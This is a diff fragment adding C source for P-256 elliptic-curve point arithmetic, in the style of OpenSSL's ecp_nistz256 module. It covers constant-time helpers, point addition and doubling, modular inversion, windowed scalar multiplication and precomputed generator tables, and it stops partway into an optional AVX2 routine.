+void ecp_nistz256_select_w7(P256_POINT_AFFINE * val,
+                            const P256_POINT_AFFINE * in_t, int index);
+
+/* One converted into the Montgomery domain */
+static const BN_ULONG ONE[P256_LIMBS] = {
+    TOBN(0x00000000, 0x00000001), TOBN(0xffffffff, 0x00000000),
+    TOBN(0xffffffff, 0xffffffff), TOBN(0x00000000, 0xfffffffe)
+};
+
+static void *ecp_nistz256_pre_comp_dup(void *);
+static void ecp_nistz256_pre_comp_free(void *);
+static void ecp_nistz256_pre_comp_clear_free(void *);
+static EC_PRE_COMP *ecp_nistz256_pre_comp_new(const EC_GROUP *group);
+
+/* Precomputed tables for the default generator */
+#include "ecp_nistz256_table.c"
+
+/* Recode window to a signed digit, see ecp_nistputil.c for details */
+static unsigned int _booth_recode_w5(unsigned int in)
+{
+    unsigned int s, d;
+
+    s = ~((in >> 5) - 1);
+    d = (1 << 6) - in - 1;
+    d = (d & s) | (in & ~s);
+    d = (d >> 1) + (d & 1);
+
+    return (d << 1) + (s & 1);
+}
+
+static unsigned int _booth_recode_w7(unsigned int in)
+{
+    unsigned int s, d;
+
+    s = ~((in >> 7) - 1);
+    d = (1 << 8) - in - 1;
+    d = (d & s) | (in & ~s);
+    d = (d >> 1) + (d & 1);
+
+    return (d << 1) + (s & 1);
+}
+
+static void copy_conditional(BN_ULONG dst[P256_LIMBS],
+                             const BN_ULONG src[P256_LIMBS], BN_ULONG move)
+{
+    BN_ULONG mask1 = -move;
+    BN_ULONG mask2 = ~mask1;
+
+    dst[0] = (src[0] & mask1) ^ (dst[0] & mask2);
+    dst[1] = (src[1] & mask1) ^ (dst[1] & mask2);
+    dst[2] = (src[2] & mask1) ^ (dst[2] & mask2);
+    dst[3] = (src[3] & mask1) ^ (dst[3] & mask2);
+    if (P256_LIMBS == 8) {
+        dst[4] = (src[4] & mask1) ^ (dst[4] & mask2);
+        dst[5] = (src[5] & mask1) ^ (dst[5] & mask2);
+        dst[6] = (src[6] & mask1) ^ (dst[6] & mask2);
+        dst[7] = (src[7] & mask1) ^ (dst[7] & mask2);
+    }
+}
+
+static BN_ULONG is_zero(BN_ULONG in)
+{
+    in |= (0 - in);
+    in = ~in;
+    in &= BN_MASK2;
+    in >>= BN_BITS2 - 1;
+    return in;
+}
+
+static BN_ULONG is_equal(const BN_ULONG a[P256_LIMBS],
+                         const BN_ULONG b[P256_LIMBS])
+{
+    BN_ULONG res;
+
+    res = a[0] ^ b[0];
+    res |= a[1] ^ b[1];
+    res |= a[2] ^ b[2];
+    res |= a[3] ^ b[3];
+    if (P256_LIMBS == 8) {
+        res |= a[4] ^ b[4];
+        res |= a[5] ^ b[5];
+        res |= a[6] ^ b[6];
+        res |= a[7] ^ b[7];
+    }
+
+    return is_zero(res);
+}
+
+static BN_ULONG is_one(const BN_ULONG a[P256_LIMBS])
+{
+    BN_ULONG res;
+
+    res = a[0] ^ ONE[0];
+    res |= a[1] ^ ONE[1];
+    res |= a[2] ^ ONE[2];
+    res |= a[3] ^ ONE[3];
+    if (P256_LIMBS == 8) {
+        res |= a[4] ^ ONE[4];
+        res |= a[5] ^ ONE[5];
+        res |= a[6] ^ ONE[6];
+    }
+
+    return is_zero(res);
+}
+
+#ifndef ECP_NISTZ256_REFERENCE_IMPLEMENTATION
+void ecp_nistz256_point_double(P256_POINT *r, const P256_POINT *a);
+void ecp_nistz256_point_add(P256_POINT *r,
+                            const P256_POINT *a, const P256_POINT *b);
+void ecp_nistz256_point_add_affine(P256_POINT *r,
+                                   const P256_POINT *a,
+                                   const P256_POINT_AFFINE *b);
+#else
+/* Point double: r = 2*a */
+static void ecp_nistz256_point_double(P256_POINT *r, const P256_POINT *a)
+{
+    BN_ULONG S[P256_LIMBS];
+    BN_ULONG M[P256_LIMBS];
+    BN_ULONG Zsqr[P256_LIMBS];
+    BN_ULONG tmp0[P256_LIMBS];
+
+    const BN_ULONG *in_x = a->X;
+    const BN_ULONG *in_y = a->Y;
+    const BN_ULONG *in_z = a->Z;
+
+    BN_ULONG *res_x = r->X;
+    BN_ULONG *res_y = r->Y;
+    BN_ULONG *res_z = r->Z;
+
+    ecp_nistz256_mul_by_2(S, in_y);
+
+    ecp_nistz256_sqr_mont(Zsqr, in_z);
+
+    ecp_nistz256_sqr_mont(S, S);
+
+    ecp_nistz256_mul_mont(res_z, in_z, in_y);
+    ecp_nistz256_mul_by_2(res_z, res_z);
+
+    ecp_nistz256_add(M, in_x, Zsqr);
+    ecp_nistz256_sub(Zsqr, in_x, Zsqr);
+
+    ecp_nistz256_sqr_mont(res_y, S);
+    ecp_nistz256_div_by_2(res_y, res_y);
+
+    ecp_nistz256_mul_mont(M, M, Zsqr);
+    ecp_nistz256_mul_by_3(M, M);
+
+    ecp_nistz256_mul_mont(S, S, in_x);
+    ecp_nistz256_mul_by_2(tmp0, S);
+
+    ecp_nistz256_sqr_mont(res_x, M);
+
+    ecp_nistz256_sub(res_x, res_x, tmp0);
+    ecp_nistz256_sub(S, S, res_x);
+
+    ecp_nistz256_mul_mont(S, S, M);
+    ecp_nistz256_sub(res_y, S, res_y);
+}
+
+/* Point addition: r = a+b */
+static void ecp_nistz256_point_add(P256_POINT *r,
+                                   const P256_POINT *a, const P256_POINT *b)
+{
+    BN_ULONG U2[P256_LIMBS], S2[P256_LIMBS];
+    BN_ULONG U1[P256_LIMBS], S1[P256_LIMBS];
+    BN_ULONG Z1sqr[P256_LIMBS];
+    BN_ULONG Z2sqr[P256_LIMBS];
+    BN_ULONG H[P256_LIMBS], R[P256_LIMBS];
+    BN_ULONG Hsqr[P256_LIMBS];
+    BN_ULONG Rsqr[P256_LIMBS];
+    BN_ULONG Hcub[P256_LIMBS];
+
+    BN_ULONG res_x[P256_LIMBS];
+    BN_ULONG res_y[P256_LIMBS];
+    BN_ULONG res_z[P256_LIMBS];
+
+    BN_ULONG in1infty, in2infty;
+
+    const BN_ULONG *in1_x = a->X;
+    const BN_ULONG *in1_y = a->Y;
+    const BN_ULONG *in1_z = a->Z;
+
+    const BN_ULONG *in2_x = b->X;
+    const BN_ULONG *in2_y = b->Y;
+    const BN_ULONG *in2_z = b->Z;
+
+    /* We encode infinity as (0,0), which is not on the curve,
+     * so it is OK. */
+    in1infty = (in1_x[0] | in1_x[1] | in1_x[2] | in1_x[3] |
+                in1_y[0] | in1_y[1] | in1_y[2] | in1_y[3]);
+    if (P256_LIMBS == 8)
+        in1infty |= (in1_x[4] | in1_x[5] | in1_x[6] | in1_x[7] |
+                     in1_y[4] | in1_y[5] | in1_y[6] | in1_y[7]);
+
+    in2infty = (in2_x[0] | in2_x[1] | in2_x[2] | in2_x[3] |
+                in2_y[0] | in2_y[1] | in2_y[2] | in2_y[3]);
+    if (P256_LIMBS == 8)
+        in2infty |= (in2_x[4] | in2_x[5] | in2_x[6] | in2_x[7] |
+                     in2_y[4] | in2_y[5] | in2_y[6] | in2_y[7]);
+
+    in1infty = is_zero(in1infty);
+    in2infty = is_zero(in2infty);
+
+    ecp_nistz256_sqr_mont(Z2sqr, in2_z);        /* Z2^2 */
+    ecp_nistz256_sqr_mont(Z1sqr, in1_z);        /* Z1^2 */
+
+    ecp_nistz256_mul_mont(S1, Z2sqr, in2_z);    /* S1 = Z2^3 */
+    ecp_nistz256_mul_mont(S2, Z1sqr, in1_z);    /* S2 = Z1^3 */
+
+    ecp_nistz256_mul_mont(S1, S1, in1_y);       /* S1 = Y1*Z2^3 */
+    ecp_nistz256_mul_mont(S2, S2, in2_y);       /* S2 = Y2*Z1^3 */
+    ecp_nistz256_sub(R, S2, S1);                /* R = S2 - S1 */
+
+    ecp_nistz256_mul_mont(U1, in1_x, Z2sqr);    /* U1 = X1*Z2^2 */
+    ecp_nistz256_mul_mont(U2, in2_x, Z1sqr);    /* U2 = X2*Z1^2 */
+    ecp_nistz256_sub(H, U2, U1);                /* H = U2 - U1 */
+
+    /*
+     * This should not happen during sign/ecdh, so no constant time violation
+     */
+    if (is_equal(U1, U2) && !in1infty && !in2infty) {
+        if (is_equal(S1, S2)) {
+            ecp_nistz256_point_double(r, a);
+            return;
+        } else {
+            memset(r, 0, sizeof(*r));
+            return;
+        }
+    }
+
+    ecp_nistz256_sqr_mont(Rsqr, R);             /* R^2 */
+    ecp_nistz256_mul_mont(res_z, H, in1_z);     /* Z3 = H*Z1*Z2 */
+    ecp_nistz256_sqr_mont(Hsqr, H);             /* H^2 */
+    ecp_nistz256_mul_mont(res_z, res_z, in2_z); /* Z3 = H*Z1*Z2 */
+    ecp_nistz256_mul_mont(Hcub, Hsqr, H);       /* H^3 */
+
+    ecp_nistz256_mul_mont(U2, U1, Hsqr);        /* U1*H^2 */
+    ecp_nistz256_mul_by_2(Hsqr, U2);            /* 2*U1*H^2 */
+
+    ecp_nistz256_sub(res_x, Rsqr, Hsqr);
+    ecp_nistz256_sub(res_x, res_x, Hcub);
+
+    ecp_nistz256_sub(res_y, U2, res_x);
+
+    ecp_nistz256_mul_mont(S2, S1, Hcub);
+    ecp_nistz256_mul_mont(res_y, R, res_y);
+    ecp_nistz256_sub(res_y, res_y, S2);
+
+    copy_conditional(res_x, in2_x, in1infty);
+    copy_conditional(res_y, in2_y, in1infty);
+    copy_conditional(res_z, in2_z, in1infty);
+
+    copy_conditional(res_x, in1_x, in2infty);
+    copy_conditional(res_y, in1_y, in2infty);
+    copy_conditional(res_z, in1_z, in2infty);
+
+    memcpy(r->X, res_x, sizeof(res_x));
+    memcpy(r->Y, res_y, sizeof(res_y));
+    memcpy(r->Z, res_z, sizeof(res_z));
+}
+
+/* Point addition when b is known to be affine: r = a+b */
+static void ecp_nistz256_point_add_affine(P256_POINT *r,
+                                          const P256_POINT *a,
+                                          const P256_POINT_AFFINE *b)
+{
+    BN_ULONG U2[P256_LIMBS], S2[P256_LIMBS];
+    BN_ULONG Z1sqr[P256_LIMBS];
+    BN_ULONG H[P256_LIMBS], R[P256_LIMBS];
+    BN_ULONG Hsqr[P256_LIMBS];
+    BN_ULONG Rsqr[P256_LIMBS];
+    BN_ULONG Hcub[P256_LIMBS];
+
+    BN_ULONG res_x[P256_LIMBS];
+    BN_ULONG res_y[P256_LIMBS];
+    BN_ULONG res_z[P256_LIMBS];
+
+    BN_ULONG in1infty, in2infty;
+
+    const BN_ULONG *in1_x = a->X;
+    const BN_ULONG *in1_y = a->Y;
+    const BN_ULONG *in1_z = a->Z;
+
+    const BN_ULONG *in2_x = b->X;
+    const BN_ULONG *in2_y = b->Y;
+
+    /*
+     * In affine representation we encode infty as (0,0), which is not on the
+     * curve, so it is OK
+     */
+    in1infty = (in1_x[0] | in1_x[1] | in1_x[2] | in1_x[3] |
+                in1_y[0] | in1_y[1] | in1_y[2] | in1_y[3]);
+    if (P256_LIMBS == 8)
+        in1infty |= (in1_x[4] | in1_x[5] | in1_x[6] | in1_x[7] |
+                     in1_y[4] | in1_y[5] | in1_y[6] | in1_y[7]);
+
+    in2infty = (in2_x[0] | in2_x[1] | in2_x[2] | in2_x[3] |
+                in2_y[0] | in2_y[1] | in2_y[2] | in2_y[3]);
+    if (P256_LIMBS == 8)
+        in2infty |= (in2_x[4] | in2_x[5] | in2_x[6] | in2_x[7] |
+                     in2_y[4] | in2_y[5] | in2_y[6] | in2_y[7]);
+
+    in1infty = is_zero(in1infty);
+    in2infty = is_zero(in2infty);
+
+    ecp_nistz256_sqr_mont(Z1sqr, in1_z);        /* Z1^2 */
+
+    ecp_nistz256_mul_mont(U2, in2_x, Z1sqr);    /* U2 = X2*Z1^2 */
+    ecp_nistz256_sub(H, U2, in1_x);             /* H = U2 - U1 */
+
+    ecp_nistz256_mul_mont(S2, Z1sqr, in1_z);    /* S2 = Z1^3 */
+
+    ecp_nistz256_mul_mont(res_z, H, in1_z);     /* Z3 = H*Z1*Z2 */
+
+    ecp_nistz256_mul_mont(S2, S2, in2_y);       /* S2 = Y2*Z1^3 */
+    ecp_nistz256_sub(R, S2, in1_y);             /* R = S2 - S1 */
+
+    ecp_nistz256_sqr_mont(Hsqr, H);             /* H^2 */
+    ecp_nistz256_sqr_mont(Rsqr, R);             /* R^2 */
+    ecp_nistz256_mul_mont(Hcub, Hsqr, H);       /* H^3 */
+
+    ecp_nistz256_mul_mont(U2, in1_x, Hsqr);     /* U1*H^2 */
+    ecp_nistz256_mul_by_2(Hsqr, U2);            /* 2*U1*H^2 */
+
+    ecp_nistz256_sub(res_x, Rsqr, Hsqr);
+    ecp_nistz256_sub(res_x, res_x, Hcub);
+    ecp_nistz256_sub(H, U2, res_x);
+
+    ecp_nistz256_mul_mont(S2, in1_y, Hcub);
+    ecp_nistz256_mul_mont(H, H, R);
+    ecp_nistz256_sub(res_y, H, S2);
+
+    copy_conditional(res_x, in2_x, in1infty);
+    copy_conditional(res_x, in1_x, in2infty);
+
+    copy_conditional(res_y, in2_y, in1infty);
+    copy_conditional(res_y, in1_y, in2infty);
+
+    copy_conditional(res_z, ONE, in1infty);
+    copy_conditional(res_z, in1_z, in2infty);
+
+    memcpy(r->X, res_x, sizeof(res_x));
+    memcpy(r->Y, res_y, sizeof(res_y));
+    memcpy(r->Z, res_z, sizeof(res_z));
+}
+#endif
+
+/* r = in^-1 mod p */
+static void ecp_nistz256_mod_inverse(BN_ULONG r[P256_LIMBS],
+                                     const BN_ULONG in[P256_LIMBS])
+{
+    /*
+     * The poly is ffffffff 00000001 00000000 00000000 00000000 ffffffff
+     * ffffffff ffffffff We use FLT and used poly-2 as exponent
+     */
+    BN_ULONG p2[P256_LIMBS];
+    BN_ULONG p4[P256_LIMBS];
+    BN_ULONG p8[P256_LIMBS];
+    BN_ULONG p16[P256_LIMBS];
+    BN_ULONG p32[P256_LIMBS];
+    BN_ULONG res[P256_LIMBS];
+    int i;
+
+    ecp_nistz256_sqr_mont(res, in);
+    ecp_nistz256_mul_mont(p2, res, in);         /* 3*p */
+
+    ecp_nistz256_sqr_mont(res, p2);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(p4, res, p2);         /* f*p */
+
+    ecp_nistz256_sqr_mont(res, p4);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(p8, res, p4);         /* ff*p */
+
+    ecp_nistz256_sqr_mont(res, p8);
+    for (i = 0; i < 7; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(p16, res, p8);        /* ffff*p */
+
+    ecp_nistz256_sqr_mont(res, p16);
+    for (i = 0; i < 15; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(p32, res, p16);       /* ffffffff*p */
+
+    ecp_nistz256_sqr_mont(res, p32);
+    for (i = 0; i < 31; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, in);
+
+    for (i = 0; i < 32 * 4; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p32);
+
+    for (i = 0; i < 32; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p32);
+
+    for (i = 0; i < 16; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p16);
+
+    for (i = 0; i < 8; i++)
+        ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p8);
+
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p4);
+
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, p2);
+
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_sqr_mont(res, res);
+    ecp_nistz256_mul_mont(res, res, in);
+
+    memcpy(r, res, sizeof(res));
+}
+
+/*
+ * ecp_nistz256_bignum_to_field_elem copies the contents of |in| to |out| and
+ * returns one if it fits. Otherwise it returns zero.
+ */
+static int ecp_nistz256_bignum_to_field_elem(BN_ULONG out[P256_LIMBS],
+                                             const BIGNUM *in)
+{
+    if (in->top > P256_LIMBS)
+        return 0;
+
+    memset(out, 0, sizeof(BN_ULONG) * P256_LIMBS);
+    memcpy(out, in->d, sizeof(BN_ULONG) * in->top);
+    return 1;
+}
+
+/* r = sum(scalar[i]*point[i]) */
+static void ecp_nistz256_windowed_mul(const EC_GROUP *group,
+                                      P256_POINT *r,
+                                      const BIGNUM **scalar,
+                                      const EC_POINT **point,
+                                      int num, BN_CTX *ctx)
+{
+    int i, j;
+    unsigned int index;
+    unsigned char (*p_str)[33] = NULL;
+    const unsigned int window_size = 5;
+    const unsigned int mask = (1 << (window_size + 1)) - 1;
+    unsigned int wvalue;
+    BN_ULONG tmp[P256_LIMBS];
+    ALIGN32 P256_POINT h;
+    const BIGNUM **scalars = NULL;
+    P256_POINT (*table)[16] = NULL;
+    void *table_storage = NULL;
+
+    if ((table_storage =
+         OPENSSL_malloc(num * 16 * sizeof(P256_POINT) + 64)) == NULL
+        || (p_str =
+            OPENSSL_malloc(num * 33 * sizeof(unsigned char))) == NULL
+        || (scalars = OPENSSL_malloc(num * sizeof(BIGNUM *))) == NULL) {
+        ECerr(EC_F_ECP_NISTZ256_WINDOWED_MUL, ERR_R_MALLOC_FAILURE);
+        goto err;
+    } else {
+        table = (void *)ALIGNPTR(table_storage, 64);
+    }
+
+    for (i = 0; i < num; i++) {
+        P256_POINT *row = table[i];
+
+        if ((BN_num_bits(scalar[i]) > 256) || BN_is_negative(scalar[i])) {
+            BIGNUM *mod;
+
+            if ((mod = BN_CTX_get(ctx)) == NULL)
+                goto err;
+            if (!BN_nnmod(mod, scalar[i], &group->order, ctx)) {
+                ECerr(EC_F_ECP_NISTZ256_WINDOWED_MUL, ERR_R_BN_LIB);
+                goto err;
+            }
+            scalars[i] = mod;
+        } else
+            scalars[i] = scalar[i];
+
+        for (j = 0; j < scalars[i]->top * BN_BYTES; j += BN_BYTES) {
+            BN_ULONG d = scalars[i]->d[j / BN_BYTES];
+
+            p_str[i][j + 0] = d & 0xff;
+            p_str[i][j + 1] = (d >> 8) & 0xff;
+            p_str[i][j + 2] = (d >> 16) & 0xff;
+            p_str[i][j + 3] = (d >>= 24) & 0xff;
+            if (BN_BYTES == 8) {
+                d >>= 8;
+                p_str[i][j + 4] = d & 0xff;
+                p_str[i][j + 5] = (d >> 8) & 0xff;
+                p_str[i][j + 6] = (d >> 16) & 0xff;
+                p_str[i][j + 7] = (d >> 24) & 0xff;
+            }
+        }
+        for (; j < 33; j++)
+            p_str[i][j] = 0;
+
+        /* table[0] is implicitly (0,0,0) (the point at infinity),
+         * therefore it is not stored. All other values are actually
+         * stored with an offset of -1 in table.
+         */
+
+        if (!ecp_nistz256_bignum_to_field_elem(row[1 - 1].X, &point[i]->X)
+            || !ecp_nistz256_bignum_to_field_elem(row[1 - 1].Y, &point[i]->Y)
+            || !ecp_nistz256_bignum_to_field_elem(row[1 - 1].Z, &point[i]->Z)) {
+            ECerr(EC_F_ECP_NISTZ256_WINDOWED_MUL, EC_R_COORDINATES_OUT_OF_RANGE);
+            goto err;
+        }
+
+        ecp_nistz256_point_double(&row[ 2 - 1], &row[ 1 - 1]);
+        ecp_nistz256_point_add   (&row[ 3 - 1], &row[ 2 - 1], &row[1 - 1]);
+        ecp_nistz256_point_double(&row[ 4 - 1], &row[ 2 - 1]);
+        ecp_nistz256_point_double(&row[ 6 - 1], &row[ 3 - 1]);
+        ecp_nistz256_point_double(&row[ 8 - 1], &row[ 4 - 1]);
+        ecp_nistz256_point_double(&row[12 - 1], &row[ 6 - 1]);
+        ecp_nistz256_point_add   (&row[ 5 - 1], &row[ 4 - 1], &row[1 - 1]);
+        ecp_nistz256_point_add   (&row[ 7 - 1], &row[ 6 - 1], &row[1 - 1]);
+        ecp_nistz256_point_add   (&row[ 9 - 1], &row[ 8 - 1], &row[1 - 1]);
+        ecp_nistz256_point_add   (&row[13 - 1], &row[12 - 1], &row[1 - 1]);
+        ecp_nistz256_point_double(&row[14 - 1], &row[ 7 - 1]);
+        ecp_nistz256_point_double(&row[10 - 1], &row[ 5 - 1]);
+        ecp_nistz256_point_add   (&row[15 - 1], &row[14 - 1], &row[1 - 1]);
+        ecp_nistz256_point_add   (&row[11 - 1], &row[10 - 1], &row[1 - 1]);
+        ecp_nistz256_point_add   (&row[16 - 1], &row[15 - 1], &row[1 - 1]);
+    }
+
+    index = 255;
+
+    wvalue = p_str[0][(index - 1) / 8];
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+
+    ecp_nistz256_select_w5(r, table[0], _booth_recode_w5(wvalue) >> 1);
+
+    while (index >= 5) {
+        for (i = (index == 255 ? 1 : 0); i < num; i++) {
+            unsigned int off = (index - 1) / 8;
+
+            wvalue = p_str[i][off] | p_str[i][off + 1] << 8;
+            wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+
+            wvalue = _booth_recode_w5(wvalue);
+
+            ecp_nistz256_select_w5(&h, table[i], wvalue >> 1);
+
+            ecp_nistz256_neg(tmp, h.Y);
+            copy_conditional(h.Y, tmp, (wvalue & 1));
+
+            ecp_nistz256_point_add(r, r, &h);
+        }
+
+        index -= window_size;
+
+        ecp_nistz256_point_double(r, r);
+        ecp_nistz256_point_double(r, r);
+        ecp_nistz256_point_double(r, r);
+        ecp_nistz256_point_double(r, r);
+        ecp_nistz256_point_double(r, r);
+    }
+
+    /* Final window */
+    for (i = 0; i < num; i++) {
+        wvalue = p_str[i][0];
+        wvalue = (wvalue << 1) & mask;
+
+        wvalue = _booth_recode_w5(wvalue);
+
+        ecp_nistz256_select_w5(&h, table[i], wvalue >> 1);
+
+        ecp_nistz256_neg(tmp, h.Y);
+        copy_conditional(h.Y, tmp, wvalue & 1);
+
+        ecp_nistz256_point_add(r, r, &h);
+    }
+
+ err:
+    if (table_storage)
+        OPENSSL_free(table_storage);
+    if (p_str)
+        OPENSSL_free(p_str);
+    if (scalars)
+        OPENSSL_free(scalars);
+}
+
+/* Coordinates of G, for which we have precomputed tables */
+const static BN_ULONG def_xG[P256_LIMBS] = {
+    TOBN(0x79e730d4, 0x18a9143c), TOBN(0x75ba95fc, 0x5fedb601),
+    TOBN(0x79fb732b, 0x77622510), TOBN(0x18905f76, 0xa53755c6)
+};
+
+const static BN_ULONG def_yG[P256_LIMBS] = {
+    TOBN(0xddf25357, 0xce95560a), TOBN(0x8b4ab8e4, 0xba19e45c),
+    TOBN(0xd2e88688, 0xdd21f325), TOBN(0x8571ff18, 0x25885d85)
+};
+
+/*
+ * ecp_nistz256_is_affine_G returns one if |generator| is the standard, P-256
+ * generator.
+ */
+static int ecp_nistz256_is_affine_G(const EC_POINT *generator)
+{
+    return (generator->X.top == P256_LIMBS) &&
+        (generator->Y.top == P256_LIMBS) &&
+        (generator->Z.top == (P256_LIMBS - P256_LIMBS / 8)) &&
+        is_equal(generator->X.d, def_xG) &&
+        is_equal(generator->Y.d, def_yG) && is_one(generator->Z.d);
+}
+
+static int ecp_nistz256_mult_precompute(EC_GROUP *group, BN_CTX *ctx)
+{
+    /*
+     * We precompute a table for a Booth encoded exponent (wNAF) based
+     * computation. Each table holds 64 values for safe access, with an
+     * implicit value of infinity at index zero. We use window of size 7, and
+     * therefore require ceil(256/7) = 37 tables.
+     */
+    BIGNUM *order;
+    EC_POINT *P = NULL, *T = NULL;
+    const EC_POINT *generator;
+    EC_PRE_COMP *pre_comp;
+    int i, j, k, ret = 0;
+    size_t w;
+
+    PRECOMP256_ROW *preComputedTable = NULL;
+    unsigned char *precomp_storage = NULL;
+
+    /* if there is an old EC_PRE_COMP object, throw it away */
+    EC_EX_DATA_free_data(&group->extra_data, ecp_nistz256_pre_comp_dup,
+                         ecp_nistz256_pre_comp_free,
+                         ecp_nistz256_pre_comp_clear_free);
+
+    generator = EC_GROUP_get0_generator(group);
+    if (generator == NULL) {
+        ECerr(EC_F_ECP_NISTZ256_MULT_PRECOMPUTE, EC_R_UNDEFINED_GENERATOR);
+        return 0;
+    }
+
+    if (ecp_nistz256_is_affine_G(generator)) {
+        /*
+         * No need to calculate tables for the standard generator because we
+         * have them statically.
+         */
+        return 1;
+    }
+
+    if ((pre_comp = ecp_nistz256_pre_comp_new(group)) == NULL)
+        return 0;
+
+    if (ctx == NULL) {
+        ctx = BN_CTX_new();
+        if (ctx == NULL)
+            goto err;
+    }
+
+    BN_CTX_start(ctx);
+    order = BN_CTX_get(ctx);
+
+    if (order == NULL)
+        goto err;
+
+    if (!EC_GROUP_get_order(group, order, ctx))
+        goto err;
+
+    if (BN_is_zero(order)) {
+        ECerr(EC_F_ECP_NISTZ256_MULT_PRECOMPUTE, EC_R_UNKNOWN_ORDER);
+        goto err;
+    }
+
+    w = 7;
+
+    if ((precomp_storage =
+         OPENSSL_malloc(37 * 64 * sizeof(P256_POINT_AFFINE) + 64)) == NULL) {
+        ECerr(EC_F_ECP_NISTZ256_MULT_PRECOMPUTE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    } else {
+        preComputedTable = (void *)ALIGNPTR(precomp_storage, 64);
+    }
+
+    P = EC_POINT_new(group);
+    T = EC_POINT_new(group);
+
+    /*
+     * The zero entry is implicitly infinity, and we skip it, storing other
+     * values with -1 offset.
+     */
+    EC_POINT_copy(T, generator);
+
+    for (k = 0; k < 64; k++) {
+        EC_POINT_copy(P, T);
+        for (j = 0; j < 37; j++) {
+            /*
+             * It would be faster to use
+             * ec_GFp_simple_points_make_affine and make multiple
+             * points affine at the same time.
+             */
+            ec_GFp_simple_make_affine(group, P, ctx);
+            ecp_nistz256_bignum_to_field_elem(preComputedTable[j]
+                                              [k].X, &P->X);
+            ecp_nistz256_bignum_to_field_elem(preComputedTable[j]
+                                              [k].Y, &P->Y);
+            for (i = 0; i < 7; i++)
+                ec_GFp_simple_dbl(group, P, P, ctx);
+        }
+        ec_GFp_simple_add(group, T, T, generator, ctx);
+    }
+
+    pre_comp->group = group;
+    pre_comp->w = w;
+    pre_comp->precomp = preComputedTable;
+    pre_comp->precomp_storage = precomp_storage;
+
+    precomp_storage = NULL;
+
+    if (!EC_EX_DATA_set_data(&group->extra_data, pre_comp,
+                             ecp_nistz256_pre_comp_dup,
+                             ecp_nistz256_pre_comp_free,
+                             ecp_nistz256_pre_comp_clear_free)) {
+        goto err;
+    }
+
+    pre_comp = NULL;
+
+    ret = 1;
+
+ err:
+    if (ctx != NULL)
+        BN_CTX_end(ctx);
+    if (pre_comp)
+        ecp_nistz256_pre_comp_free(pre_comp);
+    if (precomp_storage)
+        OPENSSL_free(precomp_storage);
+    if (P)
+        EC_POINT_free(P);
+    if (T)
+        EC_POINT_free(T);
+    return ret;
+}
+
+/*
+ * Note that by default ECP_NISTZ256_AVX2 is undefined. While it's great
+ * code processing 4 points in parallel, corresponding serial operation
+ * is several times slower, because it uses 29x29=58-bit multiplication
+ * as opposite to 64x64=128-bit in integer-only scalar case. As result
+ * it doesn't provide *significant* performance improvement. Note that
+ * just defining ECP_NISTZ256_AVX2 is not sufficient to make it work,
+ * you'd need to compile even asm/ecp_nistz256-avx.pl module.
+ */
+#if defined(ECP_NISTZ256_AVX2)
+# if !(defined(__x86_64) || defined(__x86_64__)) || \
+       defined(_M_AMD64) || defined(_MX64)) || \
+     !(defined(__GNUC__) || defined(_MSC_VER)) /* this is for ALIGN32 */
+#  undef ECP_NISTZ256_AVX2
+# else
+/* Constant time access, loading four values, from four consecutive tables */
+void ecp_nistz256_avx2_select_w7(P256_POINT_AFFINE * val,
+                                 const P256_POINT_AFFINE * in_t, int index);
+void ecp_nistz256_avx2_multi_select_w7(void *result, const void *in, int index0,
+                                       int index1, int index2, int index3);
+void ecp_nistz256_avx2_transpose_convert(void *RESULTx4, const void *in);
+void ecp_nistz256_avx2_convert_transpose_back(void *result, const void *Ax4);
+void ecp_nistz256_avx2_point_add_affine_x4(void *RESULTx4, const void *Ax4,
+                                           const void *Bx4);
+void ecp_nistz256_avx2_point_add_affines_x4(void *RESULTx4, const void *Ax4,
+                                            const void *Bx4);
+void ecp_nistz256_avx2_to_mont(void *RESULTx4, const void *Ax4);
+void ecp_nistz256_avx2_from_mont(void *RESULTx4, const void *Ax4);
+void ecp_nistz256_avx2_set1(void *RESULTx4);
+int ecp_nistz_avx2_eligible(void);
+
+static void booth_recode_w7(unsigned char *sign,
+                            unsigned char *digit, unsigned char in)
+{
+    unsigned char s, d;
+
+    s = ~((in >> 7) - 1);
+    d = (1 << 8) - in - 1;
+    d = (d & s) | (in & ~s);
+    d = (d >> 1) + (d & 1);
+
+    *sign = s & 1;
+    *digit = d;
+}
+
+/*
+ * ecp_nistz256_avx2_mul_g performs multiplication by G, using only the
+ * precomputed table. It does 4 affine point additions in parallel,
+ * significantly speeding up point multiplication for a fixed value.
+ */
+static void ecp_nistz256_avx2_mul_g(P256_POINT *r,
+                                    unsigned char p_str[33],
+                                    const P256_POINT_AFFINE(*preComputedTable)[64])
+{
+    const unsigned int window_size = 7;
+    const unsigned int mask = (1 << (window_size + 1)) - 1;
+    unsigned int wvalue;
+    /* Using 4 windows at a time */
+    unsigned char sign0, digit0;
+    unsigned char sign1, digit1;
+    unsigned char sign2, digit2;
+    unsigned char sign3, digit3;
+    unsigned int index = 0;
+    BN_ULONG tmp[P256_LIMBS];
+    int i;
+
+    ALIGN32 BN_ULONG aX4[4 * 9 * 3] = { 0 };
+    ALIGN32 BN_ULONG bX4[4 * 9 * 2] = { 0 };
+    ALIGN32 P256_POINT_AFFINE point_arr[P256_LIMBS];
+    ALIGN32 P256_POINT res_point_arr[P256_LIMBS];
+
+    /* Initial four windows */
